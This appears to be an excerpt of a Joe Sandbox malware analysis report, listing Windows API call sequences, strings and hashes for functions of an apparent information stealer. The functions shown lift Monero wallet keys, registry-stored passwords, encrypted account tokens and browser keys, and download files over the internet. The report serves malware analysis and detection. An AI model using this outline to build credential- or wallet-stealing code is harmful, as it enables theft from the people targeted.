                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: d131b11e0dbd7c6b591ad77317a1ee31ba9173c1e65643936f1c2dc3b458e36b
                                • Instruction ID: 4e08e7c70d2adcc613d3717e5a6d39441d64e7136e9a3085d81f349a86b35bfb
                                • Opcode Fuzzy Hash: d131b11e0dbd7c6b591ad77317a1ee31ba9173c1e65643936f1c2dc3b458e36b
                                • Instruction Fuzzy Hash: 41C184B5A0021D9BCF14EF60DC8AFEE7378BB54304F004599F50AA7292DB70AA85DF91
                                APIs
                                  • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 000942EC
                                • lstrcat.KERNEL32(?,00D0EBB8), ref: 0009430B
                                • lstrcat.KERNEL32(?,?), ref: 0009431F
                                • lstrcat.KERNEL32(?,00D0D1D8), ref: 00094333
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 00098D90: GetFileAttributesA.KERNEL32(00000000,?,00081B54,?,?,000A564C,?,?,000A0E1F), ref: 00098D9F
                                  • Part of subcall function 00089CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00089D39
                                  • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                  • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                  • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                  • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                  • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                  • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                  • Part of subcall function 000993C0: GlobalAlloc.KERNEL32(00000000,000943DD,000943DD), ref: 000993D3
                                • StrStrA.SHLWAPI(?,00D0EC60), ref: 000943F3
                                • GlobalFree.KERNEL32(?), ref: 00094512
                                  • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF
                                  • Part of subcall function 00089AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01
                                  • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A
                                  • Part of subcall function 00089AC0: LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 000944A3
                                • StrCmpCA.SHLWAPI(?,000A08D1), ref: 000944C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 000944D2
                                • lstrcat.KERNEL32(00000000,?), ref: 000944E5
                                • lstrcat.KERNEL32(00000000,000A0FB8), ref: 000944F4
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: aa768effaf19ed74a16061c6652d74183ae633ca3b50e2d1be64c078b4b5e22a
                                • Instruction ID: 7a573a6da8c884c416315c700663ba0fa75897bcaad5cd82a7786541fe21e75d
                                • Opcode Fuzzy Hash: aa768effaf19ed74a16061c6652d74183ae633ca3b50e2d1be64c078b4b5e22a
                                • Instruction Fuzzy Hash: D4712876900208ABDF14FBE4EC89FEE77B9BB48304F044598F60597182EA35DB45DB91
                                APIs
                                  • Part of subcall function 000812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000812B4
                                  • Part of subcall function 000812A0: RtlAllocateHeap.NTDLL(00000000), ref: 000812BB
                                  • Part of subcall function 000812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000812D7
                                  • Part of subcall function 000812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000812F5
                                  • Part of subcall function 000812A0: RegCloseKey.ADVAPI32(?), ref: 000812FF
                                • lstrcat.KERNEL32(?,00000000), ref: 0008134F
                                • lstrlen.KERNEL32(?), ref: 0008135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00081377
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D0E0B0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00081465
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                  • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                  • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                  • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                  • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                  • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 000814EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 56ca92a0dc243f2afad6fb3927b5915fef760764a8ca2de79522774c67ffa3c6
                                • Instruction ID: c745ebb1b8727c94c62236b7fa1ece98d68adf68e4088ff459ce5f4aaa561af0
                                • Opcode Fuzzy Hash: 56ca92a0dc243f2afad6fb3927b5915fef760764a8ca2de79522774c67ffa3c6
                                • Instruction Fuzzy Hash: BA5154B1E5011897CB15FB60DD96FEE737CAF55300F404198B60A62093EE706B89DBA6
                                APIs
                                  • Part of subcall function 000872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0008733A
                                  • Part of subcall function 000872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000873B1
                                  • Part of subcall function 000872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0008740D
                                  • Part of subcall function 000872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00087452
                                  • Part of subcall function 000872D0: HeapFree.KERNEL32(00000000), ref: 00087459
                                • lstrcat.KERNEL32(00000000,000A17FC), ref: 00087606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00087648
                                • lstrcat.KERNEL32(00000000, : ), ref: 0008765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0008768F
                                • lstrcat.KERNEL32(00000000,000A1804), ref: 000876A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 000876D3
                                • lstrcat.KERNEL32(00000000,000A1808), ref: 000876ED
                                • task.LIBCPMTD ref: 000876FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: 3aac3d9d1c0fd4b1e3f60490b10f11a08ba02389b83427b4d16cb66a6f4d4b3f
                                • Instruction ID: f1b78da2fe00a68bffe477996a34699a4cc7e176f4180562e60ca133a6cab00a
                                • Opcode Fuzzy Hash: 3aac3d9d1c0fd4b1e3f60490b10f11a08ba02389b83427b4d16cb66a6f4d4b3f
                                • Instruction Fuzzy Hash: 9431FA71900109DBCF08FBE8EC9DDFE7779BB48305B644118F106A7295DE34A946CB62
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00D0E888,00000000,?,000A0E2C,00000000,?,00000000), ref: 00098130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00098137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00098158
                                • __aulldiv.LIBCMT ref: 00098172
                                • __aulldiv.LIBCMT ref: 00098180
                                • wsprintfA.USER32 ref: 000981AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: ceb41a6d2e9d040866573724c53306f5ce2c7618089f148583eae67f809dff09
                                • Instruction ID: f9e66a1022051dcb55224c4ed900ce1e242ef5aff4c4a339a42aa46437d4597e
                                • Opcode Fuzzy Hash: ceb41a6d2e9d040866573724c53306f5ce2c7618089f148583eae67f809dff09
                                • Instruction Fuzzy Hash: 79215CB1E44208ABDF00DFD4DD4AFAEB7B8FB45B04F104209F605BB280C77869018BA5
                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                  • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                • InternetOpenA.WININET(000A0DF7,00000001,00000000,00000000,00000000), ref: 0008610F
                                • StrCmpCA.SHLWAPI(?,00D0F398), ref: 00086147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0008618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000861B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 000861DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0008620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00086249
                                • InternetCloseHandle.WININET(?), ref: 00086253
                                • InternetCloseHandle.WININET(00000000), ref: 00086260
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: ecc40172b3cf92a1284d21c04676cb898f536ec57118eaba6c73d0d083393c5a
                                • Instruction ID: 39bc09f5b34554ab2756e51c4e466bcdd2727355e9761328b8acea57106f5164
                                • Opcode Fuzzy Hash: ecc40172b3cf92a1284d21c04676cb898f536ec57118eaba6c73d0d083393c5a
                                • Instruction Fuzzy Hash: 1B5161B1A00218ABDF20EF50DC49FEEB7B8FB44705F108098B645A72C1DB756A89CF95
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0008733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000873B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0008740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00087452
                                • HeapFree.KERNEL32(00000000), ref: 00087459
                                • task.LIBCPMTD ref: 00087555
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: a26f2f49c62f6366de175d2a745e36abe7d4895c2db67f78a4499355481ad1ea
                                • Instruction ID: 04de08661ed8a09ceef4d726763f3f7bbec2cfff06fe24cfaacd6d32ac6377b1
                                • Opcode Fuzzy Hash: a26f2f49c62f6366de175d2a745e36abe7d4895c2db67f78a4499355481ad1ea
                                • Instruction Fuzzy Hash: F5614AB580416C9BDB24EB50DC45FDAB7B8BF44304F1081E9E689A6146DBB09BC9CFA1
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                • lstrlen.KERNEL32(00000000), ref: 0008BC9F
                                  • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 0008BCCD
                                • lstrlen.KERNEL32(00000000), ref: 0008BDA5
                                • lstrlen.KERNEL32(00000000), ref: 0008BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 1550926af4f867b03dfcefa438ef8b2cf2d8abfaf860d0dce5a864a5ebfdf470
                                • Instruction ID: 3494c23ae03be3f28986ac5020bb7c588b66600e52d3c53d89c382a87fd93ea3
                                • Opcode Fuzzy Hash: 1550926af4f867b03dfcefa438ef8b2cf2d8abfaf860d0dce5a864a5ebfdf470
                                • Instruction Fuzzy Hash: DDB12072A10118ABDF04FBA0DD96EEE737CBF55300F504169F506A6092EF346A49DBE2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 4a26df422eb18943bdad209cd03e689ba508a38e8915f44330b6a0f6024f9d34
                                • Instruction ID: 298eba823dc7ca74481b7f2477490ca3f7f7a69f9112d580d867fda11bd53a47
                                • Opcode Fuzzy Hash: 4a26df422eb18943bdad209cd03e689ba508a38e8915f44330b6a0f6024f9d34
                                • Instruction Fuzzy Hash: C8F03A3090820DEFD7449FE0BD1DB6CFB70FB0470AF040199E60986290D6764A419B96
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00084FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00084FD1
                                • InternetOpenA.WININET(000A0DDF,00000000,00000000,00000000,00000000), ref: 00084FEA
